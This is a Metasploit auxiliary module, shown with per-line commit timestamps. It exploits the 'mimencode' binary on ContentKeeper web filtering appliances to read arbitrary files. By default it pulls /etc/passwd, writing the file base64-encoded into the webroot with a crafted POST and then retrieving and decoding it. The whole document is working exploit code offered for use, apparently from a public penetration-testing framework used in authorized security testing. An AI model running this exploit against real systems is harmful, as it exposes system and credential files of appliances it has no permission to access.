2011-04-10 15:27:17 +00:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
2011-04-10 15:27:17 +00:00
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf :: Auxiliary
2011-04-10 15:27:17 +00:00
include Msf :: Exploit :: Remote :: HttpClient
include Msf :: Auxiliary :: Scanner
def initialize
super (
2023-02-08 14:30:08 +00:00
'Name' = > 'ContentKeeper Web Appliance mimencode File Access' ,
2011-04-10 15:27:17 +00:00
'Description' = > %q{
This module abuses the 'mimencode' binary present within
ContentKeeper Web filtering appliances to retrieve arbitrary
files outside of the webroot.
} ,
2023-02-08 14:30:08 +00:00
'References' = > [
[ 'OSVDB' , '54551' ] ,
[ 'URL' , 'http://www.aushack.com/200904-contentkeeper.txt' ] ,
] ,
'Author' = > [ 'aushack' ] ,
'License' = > MSF_LICENSE )
2011-04-10 15:27:17 +00:00
register_options (
[
OptString . new ( 'FILE' , [ true , 'The file to traverse for' , '/etc/passwd' ] ) ,
OptString . new ( 'URL' , [ true , 'The path to mimencode' , '/cgi-bin/ck/mimencode' ] ) ,
2023-02-08 14:30:08 +00:00
]
)
2011-04-10 15:27:17 +00:00
end
2023-02-08 14:30:08 +00:00
def run_host ( _ip )
2024-01-07 15:02:53 -05:00
tmpfile = Rex :: Text . rand_text_alphanumeric ( 20 ) # Store the base64 encoded traversal data in a hard-to-brute filename, just in case.
2011-04-10 15:27:17 +00:00
2023-02-08 14:30:08 +00:00
print_status ( " Attempting to connect to #{ rhost } : #{ rport } " )
res = send_request_raw (
{
'method' = > 'POST' ,
'uri' = > normalize_uri ( datastore [ 'URL' ] ) + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore [ 'FILE' ]
} , 25
)
2011-04-10 15:27:17 +00:00
2023-02-08 14:30:08 +00:00
if ( res && ( res . code == 500 ) )
2011-04-10 15:27:17 +00:00
2023-02-08 14:30:08 +00:00
print_good ( " Request appears successful on #{ rhost } : #{ rport } ! Response: #{ res . code } " )
2011-11-20 13:12:07 +11:00
2023-02-08 14:30:08 +00:00
file = send_request_raw (
{
'method' = > 'GET' ,
'uri' = > '/' + tmpfile
} , 25
)
2011-11-20 13:12:07 +11:00
2023-02-08 14:30:08 +00:00
if ( file && ( file . code == 200 ) )
print_status ( " Request for #{ datastore [ 'FILE' ] } appears to have worked on #{ rhost } : #{ rport } ! Response: #{ file . code } \r \n #{ Rex :: Text . decode_base64 ( file . body ) } " )
elsif ( file && file . code )
2011-04-10 15:27:17 +00:00
print_error ( " Attempt returned HTTP error #{ res . code } on #{ rhost } : #{ rport } Response: \r \n #{ res . body } " )
end
2023-02-08 14:30:08 +00:00
elsif ( res && res . code )
print_error ( " Attempt returned HTTP error #{ res . code } on #{ rhost } : #{ rport } Response: \r \n #{ res . body } " )
2011-04-10 15:27:17 +00:00
end
2023-02-08 14:30:08 +00:00
rescue :: Rex :: ConnectionRefused , :: Rex :: HostUnreachable , :: Rex :: ConnectionTimeout
rescue :: Timeout :: Error , :: Errno :: EPIPE
2011-04-10 15:27:17 +00:00
end
end
